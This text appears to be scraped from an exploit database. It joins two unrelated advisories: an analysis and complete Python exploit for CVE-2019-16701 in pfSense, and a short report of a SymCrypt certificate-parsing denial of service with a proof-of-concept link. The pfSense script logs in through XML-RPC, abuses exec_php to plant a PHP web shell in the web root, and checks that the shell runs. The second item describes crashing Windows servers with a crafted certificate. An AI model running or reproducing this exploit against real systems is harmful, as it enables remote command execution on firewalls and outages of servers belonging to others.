As we can see, there is first an authentication check, and then the dangerous function (eval) is called with ($code) as its parameter. public function exec_php($code) { $this->auth(); eval($code); if ($toreturn) { return $toreturn; } return true; } Line (155 - 160) In this part of the code there is likewise an authentication check, followed by the execution of ($code). public function exec_shell($code) { $this->auth(); mwexec($code); return true; } 3 - Exploit: ============ #!/usr/bin/env python import argparse import requests import urllib2 import time import sys import string import random parser = argparse.ArgumentParser() parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1") parser.add_argument("--password", help = "pfsense Password") args = parser.parse_args() rhost = args.rhost password = args.password print "" print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection" print "" print "[+] Author: Nassim Asrir" print "" command = "<?xml version='1.0' encoding='iso-8859-1'?>" command += "<methodCall>" command += "<methodName>pfsense.host_firmware_version</methodName>" command += "<params>" command += "<param><value><string>"+password+"</string></value></param>" command += "</params>" command += "</methodCall>" stage1 = rhost + "/xmlrpc.php" page = urllib2.urlopen(stage1, data=command).read() print "[+] Checking Login Creds" if "Authentication failed" in page: print "[-] Wrong password :(" sys.exit(0) else: random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) print "[+] logged in successfully :)" print "[+] Generating random file "+random+".php" print "[+] Sending the exploit ....." 
command = "<?xml version='1.0' encoding='iso-8859-1'?>" command += "<methodCall>" command += "<methodName>pfsense.exec_php</methodName>" command += "<params>" command += "<param><value><string>"+password+"</string></value></param>" command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>" command += "</params>" command += "</methodCall>" stage1 = rhost + "/xmlrpc.php" page = urllib2.urlopen(stage1, data=command).read() final = rhost+"/"+str(random)+".php" check = urllib2.urlopen(final) print "[+] Checking ....." if check.getcode() == 200: print "[+] Yeah! You got your shell: " + final+"?cmd=id" else: print "[+] Sorry :( Shell not found check the path"
  25. There's a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric. I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) calls these routines on untrusted data, and this will cause it to hang indefinitely. You can verify it like so, and notice that the command never completes: C:\> certutil.exe testcase.crt Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47414.zip